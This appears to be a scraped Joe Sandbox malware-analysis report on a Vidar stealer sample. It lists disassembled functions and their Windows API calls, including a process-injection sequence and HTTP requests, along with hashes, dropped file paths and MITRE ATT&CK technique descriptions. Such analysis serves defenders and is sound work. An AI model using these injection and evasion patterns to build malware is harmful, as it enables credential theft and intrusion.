memmove.MSVCRT ref: 0040E969

Strings

invalid string position, xrefs: 0040E92B

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
String ID: invalid string position
API String ID: 1659287814-1799206989
Opcode ID: f97c601c4e22bc11f73bdc13f7d6f7448820bd60555938bed086b3ec4847633e
Instruction ID: 9802af65f48c4a0334408e40b234199155afed96a9865595e4f9dfd6fcdb0f46
Opcode Fuzzy Hash: f97c601c4e22bc11f73bdc13f7d6f7448820bd60555938bed086b3ec4847633e
Instruction Fuzzy Hash: 6F0128B23003014BD7249E69C99082BB7A6EB817107204D3FD4D59B385DBB9EC5687ED

Function 004122D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004122DB

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768

Part of subcall function 004041B2: _EH_prolog.MSVCRT ref: 004041B7
Part of subcall function 004041B2: GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004041FE
Part of subcall function 004041B2: RtlAllocateHeap.NTDLL(00000000), ref: 00404205
Part of subcall function 004041B2: InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404224
Part of subcall function 004041B2: StrCmpCA.SHLWAPI(?), ref: 00404238
Part of subcall function 004041B2: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040425C
Part of subcall function 004041B2: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404292
Part of subcall function 004041B2: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004042B6
Part of subcall function 004041B2: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004042C1

Part of subcall function 0040FE58: memset.MSVCRT ref: 0040FE81
Part of subcall function 0040FE58: memset.MSVCRT ref: 0040FE8D
Part of subcall function 0040FE58: CreateProcessA.KERNEL32(?,J#A,00000000,00000000,00000000,08000004,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0040FEAD
Part of subcall function 0040FE58: VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,?,?,?,00000000,00000000), ref: 0040FEC1
Part of subcall function 0040FE58: GetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,00000000), ref: 0040FED3
Part of subcall function 0040FE58: ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,?,?,00000000,00000000), ref: 0040FEF2
Part of subcall function 0040FE58: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,00000000,00000000), ref: 0040FF08
Part of subcall function 0040FE58: ResumeThread.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 0040FF18

Strings

C:\Windows\system32\cmd.exe, xrefs: 00412340
C:\Windows\system32\cmd.exe, xrefs: 0041232E

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InternetProcess$AllocH_prologHeapHttpOpenRequestThreadVirtuallstrcpymemset$AllocateConnectContextCreateMemoryOptionReadResumeSend
String ID: C:\Windows\system32\cmd.exe$C:\Windows\system32\cmd.exe
API String ID: 2744571281-3520584164
Opcode ID: 48c00dabfe6732b60cffb06e03e7ebd249ffd90821f05cbba0bff7b919695fee
Instruction ID: 6b8cab2fc6870a534da447030600b668c0e13afa70a54e89719b9d5b2ca8f0bf
Opcode Fuzzy Hash: 48c00dabfe6732b60cffb06e03e7ebd249ffd90821f05cbba0bff7b919695fee
Instruction Fuzzy Hash: C901E970E04254ABCB10FBB5D9067EDBB60AB00704F10416BEC15726C2D6B81B8486DA

Function 1B6B7200 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

Strings

invalid, xrefs: 1B6B721B
API call with %s database connection pointer, xrefs: 1B6B7220

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: API call with %s database connection pointer$invalid
API String ID: 0-3574585026
Opcode ID: 1a3e5842ef4c9bed3f05a1a8a5f411c4a12e263afe4b9de163576746bc825e87
Instruction ID: ce1cb60d08a7df148c90e2c8fc665d26a584b3ec89e1c2edc27efc0b053bd449
Opcode Fuzzy Hash: 1a3e5842ef4c9bed3f05a1a8a5f411c4a12e263afe4b9de163576746bc825e87
Instruction Fuzzy Hash: 4EF0C2F1B056104BCE204B28FD14BF777BA7B60B21F090559F6E696290C238E454C391

Function 1B763C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON

Download Yara Rule

Strings

%z%s%z, xrefs: 1B763C6B

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %z%s%z
API String ID: 0-3434679432
Opcode ID: 6c7504cf15be94c28fa4abd564b82e2114003592e6f1c06552a58613af74a5a3
Instruction ID: f2be5920cdd5741c464ce272fb807601579a2ca3e01469da91740f2afd97a3b6
Opcode Fuzzy Hash: 6c7504cf15be94c28fa4abd564b82e2114003592e6f1c06552a58613af74a5a3
Instruction Fuzzy Hash: 88F0E2B09007028FEB108B29E8916EB72E9FF88381F41092DFC86C2980F331F844CB51

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\ECGHJJEHDHCA\BFCGDA

C:\ProgramData\ECGHJJEHDHCA\BGDGHJ

C:\ProgramData\ECGHJJEHDHCA\DBKKFC

C:\ProgramData\ECGHJJEHDHCA\EBGDHJ

C:\ProgramData\ECGHJJEHDHCA\FBKECF

C:\ProgramData\ECGHJJEHDHCA\HJJKFB

C:\ProgramData\ECGHJJEHDHCA\IDAEHC

C:\ProgramData\ECGHJJEHDHCA\JEHIID

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sqls[1].dll

Static File Info

General

Windows Analysis Report
file.exe

Function 00FC018D Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 282
threadinjectionmemoryCOMMON

Function 0100C44B Relevance: .0, Instructions: 22
COMMONLIBRARYCODE

Function 010049AA Relevance: .0, Instructions: 12
COMMONLIBRARYCODE

Function 00FF5380 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 70
registrylibraryloaderCOMMON

Function 010076DE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Function 00FF5237 Relevance: 4.5, APIs: 3, Instructions: 34
memorythreadCOMMON

Function 01004936 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Function 00FF6FD2 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Function 010077A9 Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre